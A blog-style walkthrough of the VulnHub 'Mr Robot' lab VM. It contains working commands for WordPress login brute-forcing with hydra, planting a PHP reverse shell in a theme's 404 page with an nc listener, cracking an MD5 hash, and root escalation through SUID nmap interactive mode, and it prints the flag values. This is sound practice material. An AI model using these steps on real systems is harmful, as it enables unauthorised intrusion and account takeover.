vulnhub robot notes
I did the eJPT a while back and hadn't really looked at any practical security content since then, so though I'd spin up a VulnHub VM. I'm just going to outline the broad steps I took to completion as this is more a note taking entry. I will list at the end any major rabbit holes I went down.
This VM has three keys to find and is listed as beginner-intermediate. Mr Robot on VulnHub
After a quick scan on the internal subnet I ran a scan against the discovered VM address and found the following:
PORT STATE SERVICE 22/tcp closed ssh 80/tcp open http 443/tcp open https MAC Address: 08:00:27:5D:81:9C (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.10 - 4.11
A quick view of the webpage shows an animated message so to get a better look at what's hosted on the webserver I ran a quick dirb. There were a lot of directories discovered, so I'm truncating what I think are most useful to look at next.
dirb http://10.10.100.50
http://10.10.100.50/robots.txt
http://10.10.100.50/wp-login
...
A quick look at robots.txt gave one of the three keys plus more importantly, a .dic file which when downloaded contains a large dump of passwords. wp-login obviously shows us this is a WordPress site. I tried a few random logins and given the name of the VM correctly guessed a username:
Next step was to try brute-force the WordPress site using the guessed username elliot and the downloaded password dump fsocity.dic
hydra -l elliot -P ~/Downloads/fsocity.dic 10.10.100.50 -F -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' [80][http-post-form] host: 10.10.100.50 login: elliot password: ER28-0652
So next step was to try get a reverse shell, I set a listener on sudo nc -lvp 6666 and added some reverse shell code from https://github.com/pentestmonkey/php-reverse-shell to the WordPress 404 page on the site then once called, the reverse shell listener was connected:
admin01@kali-1:~$ sudo nc -lvp 6666 listening on [any] 6666 ... 10.10.100.50: inverse host lookup failed: Unknown host connect to [10.10.100.51] from (UNKNOWN) [10.10.100.50] 44199 Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux 09:51:53 up 12:39, 0 users, load average: 4.71, 4.97, 5.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=1(daemon) gid=1(daemon) groups=1(daemon) /bin/sh: 0: can't access tty; job control turned off python -c 'import pty; pty.spawn("/bin/sh")' $ whoami daemon $ hostname linux
After a bit of looking around I found the second key however I don't have access to read it, there is an md5 encrypted password listed so going to try running that through John The Ripper.
$ pwd /home/robot $ ls key-2-of-3.txt password.raw-md5 $ cat key-2-of-3.txt cat: key-2-of-3.txt: Permission denied $ ls -al total 16 drwxr-xr-x 2 root root 4096 Nov 13 2015 . drwxr-xr-x 3 root root 4096 Nov 13 2015 .. -r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt -rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5 $ cat password.raw-md5 robot:c3fcd3d76192e4007dfb496cca67e13b
Copied the string to my VM and ran the following
sudo john --format=raw-md5 ./robot-pass.txt
With John the Ripper running (see notes below) I tried a few online md5 conversion sites and one https://md5.web-max.ca came up good:
A quick su to the robot account and I got the second key:
robot@linux:~$ whoami whoami robot robot@linux:~$ pwd pwd /home/robot cat key-2-of-3.txt 822c73956184f694993bede3eb39f959
Checking for any interesting SUID or GUID executables I saw that nmap was installed and had the SUID bit set with an owner of root (tut tut!)
$ find / -perm -u=s -type f 2>/dev/null find / -perm -u=s -type f 2>/dev/null . . . /usr/local/bin/nmap
I was able to run it in interactive mode and get the last key
$ nmap --interactive nmap --interactive Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h <enter> for help nmap> !whoami root nmap> !ls /root firstboot_done key-3-of-3.txt nmap> !cat /root/key-3-of-3.txt 04787ddef27c3dee1ee161b21670b4e4
rabbit holes
- I did try to brute-force ssh using the discovered username and password dump but got an immediate connection refused, seems it's key based authentication only.
- John the Ripper default settings didn't crack anything after many hours, I did try later using the downloaded .dic password file AND the
--rulesflag and it did discover the password. - Before going down the SUID route I compiled multiple Kernal exploits listed in exploit-db as the Kernel was running 3.13.0, but none of them ran successfully.